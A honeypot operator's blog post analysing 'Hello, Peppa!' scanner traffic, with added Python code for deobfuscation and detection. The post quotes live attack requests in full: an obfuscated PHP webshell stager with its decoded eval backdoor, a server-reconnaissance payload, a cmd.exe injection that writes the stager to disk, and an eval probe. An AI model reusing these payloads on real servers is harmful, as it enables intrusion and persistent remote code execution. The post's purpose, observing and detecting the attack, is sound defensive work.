The mysterious "Hello, Peppa!" access - とりあえずブログ
Hello, Peppa! access log
This curious "Hello, Peppa!" access also reached the WOWHoneypot I operate. There were several patterns, so I have pulled the logs out and present them below.
Log 1
POST /cmx.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 5433
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------c7145c544564e14d

--------------------------c7145c544564e14d
Content-Disposition: form-data; name="_upl"

Upload
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="h"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="w"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="leng"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="a"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="b"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="c"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="abc"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="0"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="cmd"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="php"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="1"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="bbs"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="m"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="js"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="2"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="3"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="!@#"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="ae"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="axa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="aaaa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="x"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="xx"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="eval"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="file"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="fileupload"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d--
multipart/form-data is the encoding used for file uploads and the like. cmx.php appears to be a file name used for WebShells. (Reference: Honeypot Observation Record (36), "An attempt to create a WebShell targeting a phpMyAdmin misconfiguration", at www.morihi-soc.net)
Decoding the Base64-encoded part gives the following.
session_start();
if(isset($_POST['code'])){
(substr(sha1(md5($_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
The logic itself does not seem to be the point; it looks more like a way of sorting hosts by whether this code can be executed, that is, by whether the vulnerability is present.
Log 2
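The one-liner dropped into images.php above is worth taking apart, so here is a small deobfuscator written for this post (added example, not code from the original log or from the scanner): it folds the per-character string concatenation back into create_function / eval(base64_decode()) and decodes the Base64 argument to recover the session backdoor, including the 4-hex-character password check it applies to the a parameter.

```python
import base64
import re

# The one-liner from log 1 (echoed again in log 3), copied from the page.
# create_function and eval(base64_decode()) are spelt one character at a time so a
# plain string match on those names fails; the real code hides in the base64 argument.
STAGER = (
    "<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';"
    "$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');"
    "$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>"
)

# Two adjacent single-quoted PHP literals joined by the '.' operator
CONCAT = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")

def fold_concats(src):
    """Merge 'a'.'b' into 'ab' until nothing changes (one pass only merges pairs)."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src

def decode_stager(src):
    """Deobfuscate the dropper and return what it actually installs."""
    folded = fold_concats(src)
    b64 = re.search(r"\$test\('([A-Za-z0-9+/=]+)'\)", folded).group(1)
    body = base64.b64decode(b64).decode()
    # Gate: substr(sha1(md5($_POST['a'])),36) is the last 4 hex chars of a 40-char sha1,
    # compared against a constant; only then is $_POST['code'] stored and later eval'd.
    gate = re.search(r"substr\(sha1\(md5\(\$_POST\['a'\]\)\),36\)=='([0-9a-f]{4})'", body)
    return {
        "folded": folded,                 # readable form of the one-liner
        "body": body,                     # the session backdoor passed to create_function
        "password_tail": gate.group(1) if gate else None,
        "uses_create_function": "create_function" in folded,
        "uses_eval_b64": "eval(base64_decode($x))" in folded,
    }
```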
POST /images.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 956
Content-Type: application/x-www-form-urlencoded

a=just+for+fun&code=[Base64 body elided]%3D%3D
Is a=just+for+fun really just for fun...? As with log 1, Base64-decoding everything after the code parameter gave the following result.
if (!function_exists('posix_getegid')) {
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
} else {
    $uid = @posix_getpwuid(@posix_geteuid());
    $gid = @posix_getgrgid(@posix_getegid());
    $uid = $uid['uid'];
    $user = $uid['name'];
    $gid = $gid['gid'];
    $group = $gid['name'];
}
echo "Hello, Peppa!|" . php_uname() ." + ". 'User:'.$uid.'('.$user.')/Group:'.$gid.'('.$group.')' ." + ".$_SERVER['SERVER_SOFTWARE'] ." + ". $_SERVER['DOCUMENT_ROOT'] ." + ". $_SERVER['SCRIPT_FILENAME'] . "|";
$self = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
$time = @strtotime("2015-07-16 17:32:32");
��ho (@touch($self,$time,$time) ? 'success' : 'failed');
The last line somehow came out garbled, but it is presumably "echo". It looks like an attempt to have the server print out various pieces of information (OS, user and group, server software, document root and script path), and then to set the script's own timestamps back to 2015-07-16 with touch().
Log 3
GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Accept: */*
URL-decoding it gives the following.
echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?^> >images.php & echo Hello, Peppa!
The string inside $test is the same as the one in log 1. The caret escaping (^< and ?^>) is cmd.exe syntax, so this is an attempt to have cmx.php run a Windows shell command that writes the same stager into images.php.
Log 4
POST /db_session.init.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));
This one, too, does not appear to do anything meaningful in itself; if the eval parameter is executed, the response simply contains "Hello, Peppa!999999999".
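Added here as an example (my own code, not part of the original post): a small Python classifier that checks a raw HTTP request against the indicators the four logs above have in common (the three paths, the Go-http-client User-Agent, the literal "Hello, Peppa!" marker, the per-character spelling of create_function, the multipart fileupload of a .php file, the a/code parameter pair of log 2 and the eval= body of log 4). The sample requests are constructed, abbreviated versions of the logs on this page.

```python
import re
from urllib.parse import unquote_plus

# Indicators lifted from the four requests quoted on this page.
PEPPA_PATHS = {"/cmx.php", "/images.php", "/db_session.init.php"}
MARKER = "Hello, Peppa!"
OBF_CREATE_FUNCTION = "'c'.'r'.'e'.'a'.'t'.'e'.'_'"  # create_function spelt one char at a time

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = {k.lower(): v for k, v in (l.split(": ", 1) for l in lines[1:])}
    return method, target, headers, body

def classify(raw):
    """Return the Hello, Peppa! indicators matched by one raw request (empty = no match)."""
    method, target, headers, body = parse_request(raw)
    path, _, query = target.partition("?")
    text = unquote_plus(query) + "\n" + unquote_plus(body)  # decode %xx and '+' once
    hits = []
    if path in PEPPA_PATHS:
        hits.append("path")
    if headers.get("user-agent", "").startswith("Go-http-client/"):
        hits.append("go-http-client")
    if MARKER in text:
        hits.append("marker")
    if OBF_CREATE_FUNCTION in text:
        hits.append("obfuscated-create_function")
    if re.search(r'name="fileupload"; filename="[^"]*\.php"', body):
        hits.append("php-file-upload")       # log 1: multipart drop of a .php file
    if re.match(r"a=[^&]*&code=", body):
        hits.append("a+code-params")         # log 2: password + payload for the stager
    if body.startswith("eval="):
        hits.append("eval-param")            # log 4: eval= probe
    return hits

# Constructed, abbreviated versions of the page's four requests, plus one benign request.
B = "--------------------------c7145c544564e14d"
LOG1 = ("POST /cmx.php HTTP/1.1\r\nHost: h\r\nUser-Agent: Go-http-client/1.1\r\n"
        + "Content-Type: multipart/form-data; boundary=" + B[2:] + "\r\n\r\n" + B
        + '\r\nContent-Disposition: form-data; name="fileupload"; filename="E:\\\\PHPnow\\\\htdocs\\\\images.php"\r\n'
        + "Content-Type: application/octet-stream\r\n\r\n<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'; ?>Hello, Peppa!\r\n"
        + B + "--\r\n")
LOG2 = "POST /images.php HTTP/1.1\r\nHost: h\r\n\r\na=just+for+fun&code=Zm9v"
LOG3 = ("GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27"
        + "+%26+echo+Hello%2C+Peppa%21 HTTP/1.1\r\nHost: h\r\nUser-Agent: Go-http-client/1.1\r\n\r\n")
LOG4 = "POST /db_session.init.php HTTP/1.1\r\nHost: h\r\n\r\neval=die('Hello, Peppa!'.(string)(111111111*9));"
BENIGN = "GET /index.html HTTP/1.1\r\nHost: h\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
```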
Looking at the WOWHoneypot logs, "Hello, Peppa!" has been observed since around May 4, but there is not much information about it online. The search results that do turn up are from May to June 2018, so perhaps it is some new scanner... I intend to keep observing the logs and gathering information.